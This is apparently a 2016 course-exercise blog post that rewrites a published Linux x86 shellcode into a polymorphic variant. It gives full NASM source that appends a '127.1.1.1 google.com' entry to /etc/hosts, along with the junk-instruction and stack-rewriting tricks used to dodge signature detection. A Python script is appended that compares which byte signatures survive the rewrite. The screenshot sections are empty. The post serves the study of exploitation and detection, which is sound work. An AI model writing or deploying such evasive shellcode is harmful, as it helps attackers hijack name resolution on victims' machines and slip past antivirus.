
Friday, March 11, 2016

6_2 - Polymorphism: adding entries to "/etc/hosts" file


6_2 - ADDING ENTRIES TO "/ETC/HOSTS" FILE

1 - INTRODUCTION

- The same concepts studied in 6_1 apply in this case.

2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice adds a new entry to the hosts file, pointing 127.1.1.1 to google.com:

http://shell-storm.org/shellcode/files/shellcode-893.php

- Let's see 3 possible modifications:

a) Based on the fact that any number ANDed with itself is the same number, the junk instruction "and edx,edx" is introduced; its effect on the functionality of the program is null:

https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29

b) Instead of pushing the "/etc///hosts" characters directly onto the stack, they are moved to the stack in 4-byte chunks:

    mov dword [esp-4],0x7374736f  ; "osts"  - written below esp instead of pushed
    mov dword [esp-8],0x682f2f2f  ; "///h"
    mov dword [esp-12],0x6374652f ; "/etc"  - together they spell "/etc///hosts"
    sub esp,0xc                   ; move esp down 12 bytes to cover the three dwords

c) Finally, instead of using the stack to load the syscall values, the "mov" instruction is used. This method is used for write (20), close (6) and exit (1):

    ;push 20
    ;pop edx
    mov dl,0x14     ; 20 (0x14), the length argument of the write syscall, is moved to dl
    int 0x80

    ;push 0x6
    ;pop eax
    mov al,0x6      ; 6, the close syscall number, is moved to al
    int 0x80

    ;push 0x1
    ;pop eax
    mov al,0x1      ; 1, the exit syscall number, is moved to al
    int 0x80

- The assembly program that results from applying these modifications is A6_2.nasm:

global _start
section .text

_start:
    and edx,edx     ; junk instruction: edx AND edx leaves edx unchanged
    xor ecx, ecx    ; ecx = 0
    mul ecx         ; eax = edx = 0 without null bytes
    mov al, 0x5     ; syscall 5: open
    push ecx        ; null terminator for the path string

    ;push 0x7374736f     ;/etc///hosts
    ;push 0x682f2f2f
    ;push 0x6374652f

    mov dword [esp-4],0x7374736f  ; "osts"  - written below esp instead of pushed
    mov dword [esp-8],0x682f2f2f  ; "///h"
    mov dword [esp-12],0x6374652f ; "/etc"  - together they spell "/etc///hosts"
    sub esp,0xc                   ; move esp down 12 bytes to cover the three dwords

    mov ebx, esp       ; ebx = pointer to "/etc///hosts"
    mov cx, 0x401      ; ecx = O_WRONLY | O_APPEND (ecx was 0, so no null bytes)
    int 0x80           ; open("/etc///hosts", O_WRONLY|O_APPEND) -> eax = fd

    xchg eax, ebx      ; ebx = fd
    push 0x4
    pop eax            ; eax = 4, syscall write
    jmp short _load_data

_write:
    pop ecx            ; ecx = address of the string pushed by call
    ;push 20
    ;pop edx
    mov dl,0x14        ; edx = 20, length of "127.1.1.1 google.com" (edx was 0)
    int 0x80           ; write(fd, string, 20)

    ;push 0x6
    ;pop eax
    mov al,0x6         ; eax = 6, syscall close (eax held 20 after write, upper bytes 0)
    int 0x80           ; close(fd)

    ;push 0x1
    ;pop eax
    mov al,0x1         ; eax = 1, syscall exit
    int 0x80           ; exit()

_load_data:
    call _write        ; pushes the address of the string below, then jumps to _write
    google db "127.1.1.1 google.com"


3 - TESTING POLYMORPHISM

- Assembling and linking A6_2.nasm:




- Extracting the shellcode:




- Applying the shellcode to the ShellcodeTest.c program:

 



- Compiling ShellcodeTest.c:




- Executing ShellcodeTest.c: 




- The result is the same as with the original program: a new entry is added to the "/etc/hosts" file, pointing 127.1.1.1 to google.com:




- While the original shellcode was 77 bytes, the new one is 88 bytes, an increase of 14%.
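As an added example (not part of the original post or of shellcode-893), the following Python script reproduces the IA-32 byte encodings of the push and mov variants of the "/etc///hosts" load from section 2, checks which byte signatures survive the rewrite, and accounts for the 11-byte growth behind the 77 to 88 byte figure. The instruction encodings are standard; the signature patterns and helper names are this example's own.

```python
import struct

# Constructed input: the path the shellcode opens, padded with '/' to 12 bytes.
PATH = b"/etc///hosts"

def path_dwords(path):
    """Split the path into little-endian dwords, ordered as the shellcode pushes them
    (last chunk first, so the string reads forward in memory once on the stack)."""
    assert len(path) % 4 == 0, "pad with extra '/' until the length is a multiple of 4"
    chunks = [struct.unpack("<I", path[i:i + 4])[0] for i in range(0, len(path), 4)]
    return chunks[::-1]

DWORDS = path_dwords(PATH)   # [0x7374736f, 0x682f2f2f, 0x6374652f] as in A6_2.nasm

def encode_push_variant(dwords):
    """Original form: push imm32 (opcode 0x68 + LE immediate, 5 bytes per chunk)."""
    return b"".join(b"\x68" + struct.pack("<I", d) for d in dwords)

def encode_mov_variant(dwords):
    """Polymorphic form: mov dword [esp-disp8], imm32 (C7 44 24 disp8 imm32, 8 bytes
    per chunk) followed by sub esp, imm8 (83 EC imm8) to cover the bytes written."""
    out = b""
    for i, d in enumerate(dwords):
        disp8 = (-4 * (i + 1)) & 0xFF            # -4, -8, -12 as a signed byte
        out += b"\xc7\x44\x24" + bytes([disp8]) + struct.pack("<I", d)
    return out + b"\x83\xec" + bytes([4 * len(dwords)])

# Two candidate detection signatures (constructed): one anchored on the push opcode,
# one anchored only on the immediate that spells "osts".
OPCODE_SIG = b"\x68" + struct.pack("<I", 0x7374736f)   # push 0x7374736f
CONST_SIG = struct.pack("<I", 0x7374736f)              # the bytes "osts" wherever they sit

def matches(blob, signature):
    """True when the byte signature occurs anywhere in the blob."""
    return signature in blob

def size_delta():
    """Net byte growth of the three modifications described in section 2."""
    junk = len(b"\x21\xd2")                                              # and edx,edx
    stack = len(encode_mov_variant(DWORDS)) - len(encode_push_variant(DWORDS))
    syscalls = 3 * (2 - 3)          # push imm8/pop reg (3 bytes) -> mov r8,imm8 (2 bytes)
    return junk + stack + syscalls  # 2 + 12 - 3 = 11, i.e. 77 -> 88 bytes

if __name__ == "__main__":
    for name, blob in (("push", encode_push_variant(DWORDS)), ("mov", encode_mov_variant(DWORDS))):
        print(name, blob.hex(), "opcode-sig:", matches(blob, OPCODE_SIG), "const-sig:", matches(blob, CONST_SIG))
    print("size delta:", size_delta())
```

The opcode-anchored signature only matches the push form, while the signature on the immediate matches both, which is why detection logic keyed on embedded constants and strings holds up better against this kind of rewriting than logic keyed on instruction bytes.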